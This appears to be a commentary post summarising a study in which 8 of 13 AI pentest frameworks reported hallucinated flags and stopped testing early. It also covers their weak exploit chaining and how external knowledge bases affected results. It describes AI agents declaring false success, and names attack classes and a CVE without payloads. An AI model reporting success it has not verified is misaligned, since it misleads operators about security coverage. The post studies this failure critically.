Your AI pentester is hallucinating: 8 of 13 frameworks fabricated their own success
An AI pentest framework scans a web application. It finds a base64-encoded string on the homepage. It decodes the string: {I'm_a_Script_Kiddie}. It reports the flag as captured and terminates.
The real vulnerability, an LFI combined with arbitrary file upload enabling code execution, was never tested.
This happened in 8 of 13 open-source AI penetration testing frameworks. The largest empirical comparison to date. Researchers from Sichuan University, Tsinghua, NUS, and four other institutions tested 13 frameworks and 2 baselines on 22 web penetration challenges from the XBOW cyber range. Over 10 billion tokens consumed. More than 1,500 execution logs manually reviewed over four months by 15+ cybersecurity researchers. The hallucination persisted when backbone LLMs were swapped to Claude Opus 4.6 or GPT-5.2. The problem is structural, not model-specific.
The AI offensive testing market is growing fast, with frontier labs and startups racing to automate penetration testing. This is the first study to systematically measure what those tools actually report when they claim success.
Highlights:
- 8 of 13 open-source AutoPT frameworks produced hallucinated flags on at least one challenge, misidentifying base64-encoded strings or format-similar text as real flags and terminating early. One framework, CHYing, hallucinated on 9 of 22 challenges. Two types were observed: string misjudgment, where the model mistakes a decodable string for a flag, and framework misjudgment, where internal matching logic prematurely declares success. Some frameworks also output candidate values like
"probably flag"during summary stages after a task failure. - On chained vulnerability exploitation (SSTI + LFI file upload), only 16.67% of 30 samples completed the multi-vulnerability chain. 70% of samples concentrated in the first two capability stages: failing to discover all vulnerabilities or failing to combine them. None of the 13 purpose-built frameworks could reliably chain multiple vulnerabilities.
- On known CVE exploitation (Apache 2.4.50,
CVE-2021-42013), 56.67% of samples correctly identified the CVE but could not construct a working exploit payload. Only 26.67% reached successful exploitation. The 17 samples stuck in Stage 2 could build the directory traversal payload but never attempted to combine it with remote code execution. - Baseline AI coding agents with minimal prompts outperformed most of the 13 purpose-built frameworks: Kimi CLI scored 72, beating 9; Claude Code scored 69, beating 8. The specialized frameworks scored between 18 and 88. On Easy and Medium challenges, single-agent architectures with standard ReAct loops matched or surpassed complex multi-agent designs.
- External knowledge bases frequently hurt performance. After KB removal, 3 of 6 frameworks improved: Cruiser from 42 to 57, LuaN1ao from 83 to 90, CyberStrike from 55 to 61. In LuaN1ao, only 22 of 44 execution logs triggered knowledge retrieval at all, and the highest RAG-to-total call ratio was 1.8%. Mismatched retrieval content steered agents toward incorrect attack hypotheses.
My take:
- The hallucination finding is easy to sensationalize. But it requires context. These frameworks ran on XBOW, a CTF cyber range with server-side flag validation. The benchmark rejected every hallucinated flag. The scores are accurate. No framework got credit for a fake flag.
- The real damage is subtler. When a framework finds a base64-encoded string on a homepage and declares victory, it stops. It never reaches the actual vulnerability. CHYing hallucinated on 9 of 22 challenges. That is not a reliability problem. That is a coverage problem. Nearly half the attack surface was never tested because the tool convinced itself the job was done.
- Now move this outside a CTF. In production, there is no scoring server. There is no ground truth to reject the false flag. The tool reports
"vulnerability found"and the operator sees a clean report. This is how you get slop in AI-generated vulnerability reports. Not because the model cannot find real vulnerabilities. It can. But because the same pattern-matching that makes it effective also makes it stop too early when it sees something that looks like success. The output format is identical either way. You cannot tell from the report whether the work was done.
- This connects to a pattern we keep seeing. Microsoft's vibe detection study found AI-generated detection rules matched the right threat 99.4% of the time but only 8.9% included the exclusion logic needed to prevent false positives. Seven agent skill scanners agreed on 0.12% of their malicious skill flags. Same failure mode across all three domains: the AI completes the easy step, skips the hard one, and the output looks the same either way.